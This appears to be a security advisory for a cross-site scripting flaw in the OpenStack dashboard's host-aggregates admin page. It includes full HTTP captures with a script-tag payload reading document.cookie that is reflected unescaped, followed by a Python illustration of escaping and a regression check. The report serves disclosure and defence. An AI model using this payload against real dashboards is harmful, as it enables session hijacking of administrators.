/admin/aggregates/ is subject to a reflected cross-site scripting issue. The impacted parameter is availability_zone. For example, here is the request for the update (the opaque sessionid cookie values have been elided from the messages below):

POST /admin/aggregates/1/update/ HTTP/1.1
Host: 23.253.125.245
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://23.253.125.245/admin/aggregates/
Content-Length: 192
Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid="[session cookie elided]"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

csrfmiddlewaretoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK&name=invisible_to_admin%3Cscript%3Exss%3C%2Fscript%3E&availability_zone=invisible_to_admin%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

The response is the following:

HTTP/1.1 200 OK
Date: Mon, 11 Aug 2014 22:42:13 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Horizon-Location: /admin/aggregates/
Vary: Cookie
Set-Cookie: sessionid="[session cookie elided]"; httponly; Path=/
Set-Cookie: messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin.\\\"\"]]"; Path=/
Content-Length: 0
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com

The GET request looks like:

GET /admin/aggregates/ HTTP/1.1
Host: 23.253.125.245
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://23.253.125.245/admin/aggregates/
Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid="[session cookie elided]"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D; messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin.\\\"\"]]"
Connection: keep-alive

And the response contains the injected XSS payload:

HTTP/1.1 200 OK
Date: Mon, 11 Aug 2014 22:42:14 GMT
Server: Apache/2.4.7 (Ubuntu)
Vary: Accept-Language,Cookie,Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Language: en
Set-Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; expires=Mon, 10-Aug-2015 22:42:14 GMT; Max-Age=31449600; Path=/
Set-Cookie: sessionid="[session cookie elided]"; httponly; Path=/
Set-Cookie: messages=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
Content-Type: text/html; charset=utf-8
Content-Length: 14400
Age: 0
Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com

Rendered response body (extracted text):

Host Aggregates - OpenStack Dashboard

OpenStack Dashboard

Success: Successfully updated aggregate: "invisible_to_admin<script>xss</script>."

Host Aggregates

Create Host Aggregate

Name | Availability Zone | Hosts | Metadata | Actions
invisible_to_admin<script>xss</script> | invisible_to_admin<script>alert(document.cookie)</script> | | availability_zone = invisible_to_admin |
Displaying 1 item

Availability Zones

Availability Zone Name | Hosts | Available
internal | mxindevstack2 (Services Up) | Yes
nova | mxindevstack2 (Services Up) | Yes
Displaying 2 items
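As an added illustration (not code from the report or from Horizon itself), the following Python stand-in shows the output-encoding defect the report describes and a regression check for it: the form body from the update request above is parsed, a table row is rendered once by raw string concatenation and once with escaping at the point of output, and `reflected_unescaped` reports which submitted fields containing markup characters come back verbatim in the response. The function names and the minimal row template are assumptions of this example; only the Python standard library is used.

```python
from html import escape
from urllib.parse import parse_qs

# Constructed sample input: the form-encoded body of the POST /admin/aggregates/1/update/
# request quoted in the report.
FORM_BODY = (
    "csrfmiddlewaretoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK"
    "&name=invisible_to_admin%3Cscript%3Exss%3C%2Fscript%3E"
    "&availability_zone=invisible_to_admin%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"
)

MARKUP_CHARS = "<>\"'"


def form_fields(body):
    """URL-decode a form body into a flat dict (first value per field)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_row_unsafe(name, zone):
    """Vulnerable pattern (hypothetical stand-in for the aggregates table): user-controlled
    values are concatenated straight into HTML, so <script> tags survive into the page."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (name, zone)


def render_row_escaped(name, zone):
    """Hardened pattern: every untrusted value is HTML-escaped at the point of output,
    which is what Django's autoescaping does unless a template marks the value safe."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (escape(name), escape(zone))


def reflected_unescaped(html, fields):
    """Regression check: names of submitted fields that contain markup characters and
    appear verbatim (unescaped) in the response body. An empty list means no reflection."""
    return sorted(
        k for k, v in fields.items()
        if any(c in v for c in MARKUP_CHARS) and v in html
    )


if __name__ == "__main__":
    fields = form_fields(FORM_BODY)
    unsafe = render_row_unsafe(fields["name"], fields["availability_zone"])
    safe = render_row_escaped(fields["name"], fields["availability_zone"])
    print("unsafe rendering reflects:", reflected_unescaped(unsafe, fields))
    print("escaped rendering reflects:", reflected_unescaped(safe, fields))
```

The same check can be run against a captured response body, as a test that fails again if any field of the form is ever reflected without escaping.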